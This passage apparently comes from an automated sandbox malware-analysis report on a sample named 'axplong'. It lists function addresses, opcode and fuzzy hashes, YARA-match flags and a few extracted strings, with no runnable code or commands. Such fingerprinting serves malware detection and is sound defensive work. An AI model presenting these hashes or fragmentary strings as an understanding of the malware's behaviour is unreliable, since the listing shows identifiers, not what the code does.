                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56af646dc3c502fcd4996c4a892a08376518df0d17073e23d92ac272d38b2f7f
                                        • Instruction ID: 1c6a9a01f915a62fa0d90bd5b4938e5e506128ce629a0f4051f033032fb4f4bb
                                        • Opcode Fuzzy Hash: 56af646dc3c502fcd4996c4a892a08376518df0d17073e23d92ac272d38b2f7f
                                        • Instruction Fuzzy Hash: 0D1184EB28D1207D3041A19B2B55AF6766EE9D76313318467B407C5907B2845B5D7032
                                        Function 04B30462 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13805c575c6f6d36563c7563e509133fb2211fa44caa19ae46520ae649afcd94
                                        • Instruction ID: 5b43dad28e3fdc6035d0cbb1b58695fe7f6436c3edd665c75605cf48c32c3edd
                                        • Opcode Fuzzy Hash: 13805c575c6f6d36563c7563e509133fb2211fa44caa19ae46520ae649afcd94
                                        • Instruction Fuzzy Hash: 2911B1EB28C1207D7042A18B2B58AF6776EE9D76313318467F403C6546F2C45B9D7032
                                        Function 04B30479 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aefe2610a8d36a04883b9a71dc3106bf8ecfb5a83de0a631aabed040d8632362
                                        • Instruction ID: 9bb5e54c8a53d9d5d884094ca2fe1d5ba3da48cdfc18dacb39cbb8310979754c
                                        • Opcode Fuzzy Hash: aefe2610a8d36a04883b9a71dc3106bf8ecfb5a83de0a631aabed040d8632362
                                        • Instruction Fuzzy Hash: 751142EB28C1207D7042A18B2B99AF67B6EE9D767133184A7F407C5906F2C85F9D7132
                                        Function 04B3049B Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 932f08c7ff06977f8ad192ebc7d5a21d5273de32f025d52a521e8a89b68a2d4f
                                        • Instruction ID: 7788d55e1541e2d4c397ce7da5f83a4d583cdfa3130f26e0bc2898566e634cc9
                                        • Opcode Fuzzy Hash: 932f08c7ff06977f8ad192ebc7d5a21d5273de32f025d52a521e8a89b68a2d4f
                                        • Instruction Fuzzy Hash: CE01C8EB28C1107D714291972B956F67A6EE9D723133184A7F407C6906B2C45B4D7131
                                        Function 04B304E9 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f392f8bdd7b7e25bc4e1589c87748263271ea724549af87e73b9b9e99f956b1a
                                        • Instruction ID: 48487d03c25bed66784825553d3f26143ff4e4cae85c3f72ea002b5259425641
                                        • Opcode Fuzzy Hash: f392f8bdd7b7e25bc4e1589c87748263271ea724549af87e73b9b9e99f956b1a
                                        • Instruction Fuzzy Hash: 8E01B5D7288120BD2142609B2BD56F27B6EEDD76723328497F447C5A0BB1886F9AB035
                                        Function 04B304DB Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6e02d8f850a5743878696925682da1f4f27b6830c20828a35b03ddb0d6559da
                                        • Instruction ID: 038ce5db6ed1b9cbd64182b41175454d8ef9b638687b65f60b3a072318ea2ea0
                                        • Opcode Fuzzy Hash: e6e02d8f850a5743878696925682da1f4f27b6830c20828a35b03ddb0d6559da
                                        • Instruction Fuzzy Hash: ACF0BBDB2882107D2042A08B2B956F37A5FECD76723318497F007CA906B5D85B99B132
                                        Function 04B3051E Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57b7110e21e87ed2a7029b5f7a4fe97d377e292552ca1c03769d8ffb6a36d462
                                        • Instruction ID: aba4cbabd563778fc0c63a0de1657d8cfc4f9a82f72a9ebe2744862d5fa50ab9
                                        • Opcode Fuzzy Hash: 57b7110e21e87ed2a7029b5f7a4fe97d377e292552ca1c03769d8ffb6a36d462
                                        • Instruction Fuzzy Hash: 10E092DB298110BA004361DB6AD63B13D9E6A2B6332314083A087C5A0531C92294B132

                                        Non-executed Functions

                                        Function 0040E440 Relevance: 14.6, Strings: 11, Instructions: 878COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4F$fed3aa
                                        • API String ID: 0-4214077434
                                        • Opcode ID: c41d1584371f665062b7117f6d64f8881460b0ea602013afde0631c37c722984
                                        • Instruction ID: 08e063baca76260160a724aa80f2e819dcc0d914e59bf8318668ea39bec56645
                                        • Opcode Fuzzy Hash: c41d1584371f665062b7117f6d64f8881460b0ea602013afde0631c37c722984
                                        • Instruction Fuzzy Hash: 45721770904248DBEF14EF69C9497DE7BB5AB42308F50819EE804273C2D77D9A88CBD6
                                        Function 00443068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 784bff45f8f49f2def9249729d82457de812e3bb94133e4cdb9e8def7e48ce0b
                                        • Instruction ID: 2066767563f3fddc5d97533bc8764efe4d7c441cd557993124edbe2cc9b284d6
                                        • Opcode Fuzzy Hash: 784bff45f8f49f2def9249729d82457de812e3bb94133e4cdb9e8def7e48ce0b
                                        • Instruction Fuzzy Hash: D3C24B71E046288FEB25CE28DD407EAB3B5EB88705F1441EBD84DE7241E778AE858F45
                                        Function 00442BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                        • Instruction ID: 9d4bdb5ccac2ccd1b8dc71bdcb067ae9d6b9e215744f4a6413e295b09c0aabfa
                                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                        • Instruction Fuzzy Hash: 08F17F71E002199FEF14CFA8C9806AEB7B1FF48314F65826EE819A7344D775AE01CB94
                                        Function 0041D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: 'kAd+F$'kAd+F
                                        • API String ID: 2659868963-4062534957
                                        • Opcode ID: b7d8164ecb7e52df6172856850afd380580e4efa302df6d9fb0d205962daf496
                                        • Instruction ID: 547416985bd4f868297ffbe0f0216cdae021c0110cf0fca0dafd29e064ac5b6b
                                        • Opcode Fuzzy Hash: b7d8164ecb7e52df6172856850afd380580e4efa302df6d9fb0d205962daf496
                                        • Instruction Fuzzy Hash: 45518CB2D00A059FDB15CF59E9917AAB7F0FB08314F24857BD805EB290E7B89980CF59
                                        Function 0041CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,0041CE82,?,?,?,?,0041CEB7,?,?,?,?,?,?,0041C42D,?,00000001), ref: 0041CB33
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FilePreciseSystem
                                        • String ID:
                                        • API String ID: 1802150274-0
                                        • Opcode ID: 68c5d3f3c5713d6b451e02c0651836a54563cda753970ec3fcd6083d356eea10
                                        • Instruction ID: efa448efb547846e03340df787e61ade6f8131aab23137c646f3263fdfc1d7ce
                                        • Opcode Fuzzy Hash: 68c5d3f3c5713d6b451e02c0651836a54563cda753970ec3fcd6083d356eea10
                                        • Instruction Fuzzy Hash: 58D0223258A138A3CA013B95FD088EDBB099B00B107001223EA08A32208AD0BC818BEE
                                        Function 00437D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                        • Instruction ID: 163a767fe777519a336abb6a8608aa8ab8698e92fa1e8424b7b8926d05cfaa85
                                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                        • Instruction Fuzzy Hash: A45176F020C60856DB388A2888967BFA79AAF1D304F14745FE4C2D7782DA1DDD45835E
                                        Function 00404CF0 Relevance: .7, Instructions: 701COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                                        • Instruction ID: c1641910f5f068dbc83447083763bac080b9dc3ce95cc9405730afd006aa50db
                                        • Opcode Fuzzy Hash: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                                        • Instruction Fuzzy Hash: BE225FB3F515145BDB0CCA5DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158648
                                        Function 00446F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c9aedf241bf446047dbacece75ad246861375fca58e40f88bb4413c4137128c
                                        • Instruction ID: e78e5dceadc69e8d34e7ae94ecde935e9b80c4c3860b7a1a4dfc010e184d8fd3
                                        • Opcode Fuzzy Hash: 1c9aedf241bf446047dbacece75ad246861375fca58e40f88bb4413c4137128c
                                        • Instruction Fuzzy Hash: 84B14B31214609DFE715CF28C486B667BE0FF45364F29865AE899CF3A1C739E982CB44
                                        Function 00404AF0 Relevance: .2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8302636fc594eee82004d29337068400af1688650941fed2d2919b055d37df22
                                        • Instruction ID: f4585b54881e19f122f9b8f661dd75a17d13245182382e038b4398489ec82c6a
                                        • Opcode Fuzzy Hash: 8302636fc594eee82004d29337068400af1688650941fed2d2919b055d37df22
                                        • Instruction Fuzzy Hash: D051D17160C3918FD319CF2DD51523ABBF1AFCA200F084A9EE1D697282DB74DA44CB92
                                        Function 0044777B Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                                        • Instruction ID: dbced400732ba9141d266082b421f4ae55b9bfa50d32b7e96a0ab320e2958a10
                                        • Opcode Fuzzy Hash: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                                        • Instruction Fuzzy Hash: 5821B673F204394B770CC57E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                                        Function 0044765B Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
